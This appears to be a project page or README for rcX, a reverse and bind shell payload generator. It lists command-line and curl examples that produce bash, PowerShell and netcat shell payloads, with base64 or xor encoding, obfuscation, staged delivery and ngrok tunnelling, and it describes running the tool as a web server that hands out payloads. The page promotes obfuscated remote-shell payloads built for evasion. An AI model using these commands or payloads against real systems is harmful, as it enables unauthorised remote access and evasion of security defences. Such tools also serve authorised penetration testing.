A powerful reverse shell generator
“rc” – stands for remote command or remote code.
“X” – you can understand as assistant or tool.
The predecessor of rcX is rsGe n(A Reverse Shell Payload Generator). Currently, it is a powerful Reverse/Bind shell Generator. More features will be added in the future.
Local use
pip install -r requirements.txt
or Download the packaged binaries
CLI Usage
Example:
1.Get a bash reverse shell and output in tabular format.
python rcX.py -l 127.0.0.1 -p 8888 -t bash --table

2. Custom shell path.
python rcX.py -l 127.0.0.1 -p 8888 -t bash -s "/bin/sh"
3. Copy the specified id payload to the clipboard.
python rcX.py -l 127.0.0.1 -p 8888 -t bash --table -c 5
4. Get a base64 encoded bash reverse shell.
python rcX.py -l 127.0.0.1 -p 8888 -t bash -e base64
5. Get a xor encoded and obfuscated bash reverse shell.
python rcX.py -l 127.0.0.1 -p 8888 -t bash -e xor --obf reverse --table --clip 7

6. Get a staging bash reverse shell.
python rcX.py -l 127.0.0.1 -p 8888 -t bash --staging-url 0 --staging-cmd 0

7. Get a staging bash reverse shell and forward local port using ngrok tunnel.
python rcX.py -l 127.0.0.1 -p 8888 -t bash --tunnel ngrok_jp
8. Get a Windows Powershell reverse shell.
python rcX.py -l 127.0.0.1 -p 8888 -t powershell -P windows
Web UI
At the same time, rcX also provides a web interface. Use rcX as a server then you can use it with your team or friends. Tip: When rcX is running as a server, if the request origin is not 127.0.0.1 or localhost, the ngrok tunnel feature will be disabled and the related options will be hidden on the Front-end
Example:
python rcX.py -w
Web CLI
When rcX is running as a server, you can use curl in terminal to get the payload.
Example:
1. Get a bash reverse shell payload
curl http://127.0.0.1/linux/bash/127.0.0.4/8888

2. Base64 encoded
curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64
3. Base64 and hex encoded
curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64,hex
4. Gzip compress and replace_char(obfuscation method)
curl http://127.0.0.1/linux/bash/127.0.0.4/8888/gzip/replace_char
5. xor encoded and reverse(obfuscation method)
curl http://127.0.0.1/linux/bash/127.0.0.4/8888/xor/reverse
6. Get a Windows powershell reverse shell payload
curl http://127.0.0.1/windows/powershell/127.0.0.4/44444
7. replace_char (obfuscation method) only without using encoder
curl http://127.0.0.1/windows/powershell/127.0.0.4/44444/,/replace_char
8. Only use staging, without any encoder and obfuscator
curl http://127.0.0.1/linux/bash/127.0.0.4/8888/,/,/1/1
9. Get a bind linux netcat shell payload
curl http://127.0.0.1/bind/linux/netcat/127.0.0.4/8888
rcX (this link opens in a new window) by FlyfishSec (this link opens in a new window)
A powerful reverse shell generator